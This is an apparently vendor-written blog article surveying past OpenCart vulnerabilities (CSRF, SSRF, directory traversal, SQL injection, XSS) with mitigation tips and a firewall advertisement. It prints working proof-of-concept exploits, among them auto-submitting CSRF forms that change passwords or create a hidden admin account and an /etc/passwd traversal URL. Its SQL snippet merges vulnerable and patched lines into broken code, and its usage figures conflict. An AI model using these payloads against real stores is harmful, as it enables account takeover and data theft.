5 important opencart security issues

Opencart security issues are important now because around 4million websites are actively using it.

Introduction to OpenCart e-commerce platform

OpenCart is an easy to use, dynamic PHP-based open source online store administration system. Being economical and open resource, it is an advantage for e-commerce start-ups. According to BuiltWith, 442,897 sites are presently utilizing OpenCart for e-commerce tasks. With popularity, OpenCart has actually also gained the attention of cyberpunks & cyber lawbreakers. This write-up is everything about OpenCart protection Issues that opencart faces presently. As well as we will certainly talk about services to mitigate these security threats.

Attackers have actually exploited OpenCart frequently. Consequently, OpenCart protection has actually turned into one of the most gone over subjects among professionals that are assigned to protect these platforms from enemies. Allow us to research a few of the typical OpenCart safety Problems, get to know regarding their tell-tale indications, and after that go over some of the safety nets.

1. OpenCart Security Issues: Cross-Site Request Forgery

In 2010 and 2018, OpenCart version 1.4 and 3.0.2.0 were found to have a Cross-Site Request Forgery vulnerability which is one of the severe OpenCart Security issues. In OpenCart version 3.0.2.0, the /upload/catalog/controller/account/password.php can be accessed via cross-site request forgery attack. The attacker needs to access the index.php in the following manner: index.php?route=account/password and s/he will be directed to the passwords folder. When they get access to this folder, they can change a user’s password. A sample code for this OpenCart Security issue is:

<html>
<body>

<form id="post123" name="post123" action="http://192.168.0.46/opencart/index.php?route=account/password&language=en-gb" method="POST" enctype="multipart/form-data"> <input type="hidden" name="password" value="CK01ck01" />
<input type="hidden" name="confirm" value="CK01ck01" />
<script>    document.getElementById('post123').submit(); </script>
</form>


</body>
</html>

In OpenCart version 1.4 (2010), due to CSRF vulnerability in index.php, remote attackers could hijack the authentication of an application’s administrative privileges. By setting the POST request’s route parameter to “user/user/insert”, the attacker could request for an administrative account session. For better understanding, a sample script is attached which performs CSRF by exploiting the POST request.

<html>

<head>

<title>OpenCart CSRF Vulnerability</title>

<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

<script type="text/javascript">

function csrfInjection()

{

var params = {

'username' : 'an_attacker',

'firstname' : 'attack',

'lastname' : 'user',

'email' : 'some.user (at) randomatackerdomain (dot) com [email concealed]',

'user_group_id' : '1', //Default group id for administrator level is 1

'password' : 'test',

'confirm' : 'test',

'status' : '1'

};

var form = document.createElement("form");

form.setAttribute("method", "post");

form.setAttribute("action", document.getElementById('site_url').value + "/index.php?route=user/user/insert");

for(var key in params)

{

var hiddenField = document.createElement("input");

hiddenField.setAttribute("type", "hidden");

hiddenField.setAttribute("name", key);

hiddenField.setAttribute("value", params[key]);

form.appendChild(hiddenField);

}

attack_result.document.body.appendChild(form);

form.submit();

}

</script>

</head>

<body>

OpenCart CSRF Vulnerability

<input type="text" name="site_url" id="site_url" size="50" />/index.php?route=user/user/insert<br />

<a href="#" onclick="csrfInjection();return false;">Add User</a>

<p>Results: (this frame can be hidden so the user never knows the attack was performed)</p>

<iframe id="attack_result" name="attack_result" width="600" height="600"></iframe>

</body>

</html>

2. OpenCart Security Issues: Server Side Request Forgery

In a different version to the series of CSRF attacks, a Server Side Request Forgery was also reported in 2014 in OpenCart 1.5.6.4. This OpenCart Security issue was found in the Cart::getProducts method in the PHP scripts located in system/library/cart.php. A sample vulnerable code snippet from the getProducts function of Cart class is as follows:

foreach ($this->session->data['cart'] as $key => $quantity)

{

$product = explode(':', $key);

$product_id = $product[0];

$stock = true;

// Options

if (!empty($product[1]))

{

$options = unserialize(base64_decode($product[1]));

}

else

{

$options = array();

}

In this code snippet, the unserialize method is being used to process the key values of the array stored into the “data[‘cart’]” session variable without proper input validation. Such values can be manipulated by an unauthenticated attacker via the $_POST[‘quantity’] parameter during an “update” request. These OpenCart Security issues can be used to inject arbitrary PHP objects into the application scope and thus allow an attacker to conduct Server-Side Request Forgery (SSRF) attacks.

3. OpenCart Security Issues:Directory Traversal

In 2009, OpenCart v1.1.8 was reported as having a directory traversal vulnerability in its index.php file. This enabled a remote attacker to access files and folders available in the website directory. The remote attacker used .. (dot dot) in the route parameter and got access to the OpenCart website. A sample of the exploit for this vulnerability is as follows:http://[site]/[path]/index.php?route=../../../../../../../../../../../../../../../etc/passwd%00

In 2018, OpenCart 3.0.2.0 was reported of a security issue pertaining to directory traversal. In this version, there is a feature called “program extension upload”. It comprises of the following steps:

  1. Upload
  2. Install
  3. Unzip
  4. Move
  5. Xml
  6. Remove

Now, if the “Remove” step is skipped, arbitrary code can be executed. This happens because the attacker can now discover a secret temporary directory name (containing 10 random digits) through a directory traversal attack involving language_info[‘code’].

In the same version, there is another directory traversal vulnerability in the editDownload function in adminmodelcatalogdownload.php via admin/index.php?route=catalog/download/edit. As a consequence, the configuration file of your OpenCart website may be downloaded by the attacker and they may tamper with it to cause disruption to your online business.

4.OpenCart Security Issues: SQL Injection

One of the most common attacks that PHP-based websites face is SQL Injection. There are four OpenCart Security issues that are based on SQL injection. The first one was reported in 2009 in OpenCart v1.1.8 which allowed remote attackers to execute arbitrary SQL commands via the order parameter. It was a case of Blind SQL injection and popped up when the order parameter was not sanitized before use. In this attack, the attacker could craft statements containing ORDER parameter in SQL and view, add, modify or delete information in the back-end database of OpenCart. The information that could be revealed to an attacker included usernames, unsalted MD5 passwords, payment gateway credentials, etc.

Then in 2010, OpenCart v1.3.2 was again reported as having an SQL injection vulnerability. The page parameter of SQL could be exploited via the index.php page of the OpenCart website. Given below are some of the example URIs which were specially crafted to demonstrate this OpenCart Security issue:http://www.example1.org/index.php?route=product%2Fspecial&path=20&page=’http://www.example2.in/index.php?route=product%2Fspecial&path=20&page=’http://www.example3.com/index.php?route=product%2Fcategory&path=20&page=andres’”

In version 2.3.0.0 of OpenCart which were using Amazon Order Tracking function, there was an SQL Injection vulnerability that was detected in upload/admin/model/openbay/amazon.php. This OpenCart security issue enabled remote authenticated administrators to execute arbitrary SQL commands via courier_id parameter to openbay.php. A code snippet of updateAmazonOrderTracking function which takes in courier_id as a parameter is shown as follows:

public function updateAmazonOrderTracking($order_id, $courier_id, $courier_from_list, $tracking_no)

{

$this->db->query(“UPDATE `”.DB_PREFIX.”amazon_order`

SET `courier_id` = ‘“.$courier_id.”’,

SET `courier_id` = ‘“.$this->db->escape($courier_id).”’,

`courier_other` = “.(int)!$courier_from_list.”,

`tracking_no` = ’”.$tracking_no.”’

`tracking_no` = ‘“.$this->db->escape($tracking_no).”’

WHERE `order_id` = “.(int)$order_id.””);

}

Thus, through this OpenCart Security vulnerability, an SQL injection could be performed and order details of another customer could be accessible to an attacker.

Related article – How to prevent SQL Injection (SQLi) in Opencart 1.5.x/2.x/3.x

5. OpenCart Security Issues:Cross-Site Scripting

The first XSS OpenCart Security issue was discovered in 2008 in OpenCart v0.7.7. There were multiple cross-site scripting (XSS) vulnerabilities reported in index.php. This enabled attackers to insert malicious web scripts or HTML through parameters firstname and search. This OpenCart Security issue was the aftermath of improper validation of user-supplied input by the index.php script. The remote attacker could exploit this vulnerability using firstname and search parameter in a specially-crafted URL. The script would then get executed in a victim’s web browser. The attack initiates when the URL is clicked. An attacker can steal the victim’s cookie-based authentication credentials.

In 2015, a similar XSS OpenCart Security issue was reported in versions of OpenCart before v2.1.0.2. The vulnerability exploited the zone_id parameter to inject arbitrary HTML script to index.php. A sample exploit code that demonstrates this vulnerability is as follows:

/opencart/index.php?route=account/address/add(zone_id - POST)

Through this vulnerability, an attacker could hijack a user’s session, change the logged in user’s password and invalidate the victim user’s session. Now, if you as an administrator are logged in to your OpenCart website, then imagine what a nightmarish experience it would be. The attacker will have full administrative privileges on your website.

In 2018, in OpenCart’s Overclocked version less than 1.11.1, there was a Cross-Site Scripting (XSS) vulnerability in user input. The input was not sanitized within the JS function. This could cause unauthorized actions and access to data, stealing of session information, denial of service, The attack exploit was found in the malicious input passed in GET parameter. A sample exploit code can be:

var token = “<?php echo $_GET[‘token’]; alert(1)?>”;

Conclusion: Combating OpenCart Security Issues

In all of these attacks, the vulnerability was being caused due to coding which did not pay heed to data security. Hence, the following are some of the security measures that you should not ignore:

  • The website administrator should make a thorough check of the various areas of code that deals with user input.
  • They must ensure that whatever data is associated with the website is properly sanitized with functions and logic.
  • Data must be properly validated before passing them to back-end servers.
  • The default account credentials should be changed.
  • The plugins, themes & templates that are being used by the website must be updated.

If you are finding it difficult to keep up with so many steps, then you can take professional help. For instance, Astra’s Web Application Firewall is a great way to mitigate all these OpenCart security issues. Astra firewall is known to block CSRF, XSS, SQLi, OWASP top 10, bad bots, and 100+ other coming threats. It also keeps a real-time check and fortifies your OpenCart from different security issues and malicious attackers.

opencart security issues
Astra Firewall for opencart security

Source

close
About Sachin Tiwari 73 Articles
I am a software engineer, and have an interest in web security or cybersecurity, love to learn in website security topic and sharing with others

Be the first to comment

Leave a Reply